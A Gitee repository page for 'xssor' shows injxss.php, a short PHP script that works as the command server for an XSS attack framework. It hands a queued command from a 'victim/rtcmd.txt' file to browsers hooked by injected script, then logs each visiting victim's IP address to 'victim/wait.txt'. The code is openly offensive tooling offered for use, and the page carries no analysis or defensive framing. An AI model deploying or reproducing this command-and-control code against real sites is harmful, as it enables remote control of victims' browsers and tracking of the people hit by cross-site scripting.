Ai
1 Star 0 Fork 0

小义的爸爸/xssor

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
injxss.php 1.39 KB
一键复制 编辑 原始数据 按行查看 历史
evilcos 提交于 2013-04-23 16:38 +08:00 . init
<?php
@header("Content-Type:text/html;charset=utf-8");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . "GMT");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
if (file_exists("victim/rtcmd.txt")){
$cmd = file_get_contents("victim/rtcmd.txt");
unlink("victim/rtcmd.txt");
echo $cmd;
} else {
echo "";
}
function get_ip()
{
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')){
$onlineip = getenv('HTTP_CLIENT_IP');
list($onlineip,) = explode(",", $onlineip);
$_SERVER["REMOTE_ADDR"] = $onlineip;
}elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')){
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
list($onlineip,) = explode(",", $onlineip);
$_SERVER["REMOTE_ADDR"] = $onlineip;
}elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')){
$onlineip = getenv('REMOTE_ADDR');
list($onlineip,) = explode(",", $onlineip);
$_SERVER["REMOTE_ADDR"] = $onlineip;
}elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')){
$onlineip = $_SERVER['REMOTE_ADDR'];
list($onlineip,) = explode(",", $onlineip);
$_SERVER["REMOTE_ADDR"] = $onlineip;
}
return $onlineip;
}
$ip = get_ip();
$fp = fopen("victim/wait.txt", "a+");
fwrite($fp, $ip);
fclose($fp);
?>
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
JavaScript
1
https://gitee.com/csharphpython/xssor.git
git@gitee.com:csharphpython/xssor.git
csharphpython
xssor
xssor
master

搜索帮助